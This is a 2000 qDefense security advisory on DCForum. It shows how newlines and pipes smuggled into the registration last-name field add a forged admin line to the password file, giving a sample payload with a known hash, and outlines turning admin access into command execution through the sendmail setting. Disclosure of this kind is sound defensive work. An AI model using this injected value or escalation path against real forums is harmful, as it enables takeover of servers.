DCForum Password File Manipukation Vulnerability (qDefense Advisory Number QDAV-5-2000-2)

[Franklin DeMatto <franklin () qDefense com>]

DCForum Password File Manipulation Vulnerability 
qDefense Advisory Number QDAV-5-2000-2

Product: DCForum

Vendor: D.C. Script

Version Tested: DCForum 2000 1.0 (Version 6.0 is believed to be vulnerable as well)

Severity: Remote; Any attacker may gain DCForum admin privileges, which result in read/write/execute privileges

Cause: Failure to validate input 


The current version of this document is available at http://qDefense.com/Advisories/QDAV-5-2000-2.html.

DCForum is a popular CGI to create message boards on web sites.

It is vulnerable to an attack which will grant a remote attacker the status of DCForum administrator, which can then be 
used to execute arbitrary commands on the server.

The DCForum password file (normally the file auth_user_file.txt, located in the /cgi-bin/dcforum/User_info directory), 
stores the user info in a text file database, using the pipe symbol ( | ) as a delimiter by default. Here is a sample 
file: 

1ejq5eWn718pA|bill|admin|William|Smith|webmaster () letstalksports com|on
mgHX9HISAezfQ|joe|normal|Joe|Smith|joe () mailboxesrus com|on
67NuyNzElLQs.|iceman|normal|Alfred|Lehoya|js124 () abracadabra com|on
79NAtkW0UxFWE|hank|normal|Harold|Jenkins|hjenkins () aricdorsresearch org|on


By registering with a last name containing url-encoded newlines and pipes, an attacker can imbed a second line into his 
last name, which will be recorded as an entirely new line in the password file, containing whatever information the 
attacker wants. For instance, an attacker may register as follows:


Username = dummyuser
Password = *****
Password again = *****
Firstname = John
Lastname = Doe\nzzw1I3xWVi.zE|evilhacker|admin|Evil|Hacker
Email = evil () hackerstogo com
When url encoded and submitted properly, this will add two lines to the auth_user_file.txt. The example 
auth_user_file.txt will now look like this:


1ejq5eWn718pA|bill|admin|William|Smith|webmaster () letstalksports com|on
mgHX9HISAezfQ|joe|normal|Joe|Smith|joe () mailboxesrus com|on
67NuyNzElLQs.|iceman|normal|Alfred|Lehoya|js124 () abracadabra com|on
79NAtkW0UxFWE|hank|normal|Harold|Jenkins|hjenkins () aricdorsresearch org|on
fgRldEzNsQL1p|dummyuser|normal|John|Doe
zzw1I3xWVi.zE|evilhacker|admin|Evil|Hacker|evil () hackerstogo com|on

As you can see, an entry, evilhacker, has been added with full admin status. This account can be used provided that the 
password hash given, zzw1I3xWVi.zE, was constructed from a known password (in this case it was "gotya"). This technique 
will work even if DCForum is set to e-mail passwords, and, with a minor modification, will work even if accounts are 
not enabled automatically. Once admin status has been acquired, an attacker can execute arbitrary commands. The easiest 
way for an attacker to do this is to set the sendmail program to the command the attacker wants to execute, set DCForum 
to e-mail the admin upon new registration, and then to register a new user.

Proof of concept:

A fully working proof-of-concept script, dcgetadmin.pl, is available at the qDefense web site ( 
http://qDefense.com/downloads/dcgetadmin_pl.txt).


Franklin DeMatto
franklin () qDefense com
qDefense - DEFENDING THE ELECTRONIC FRONTIER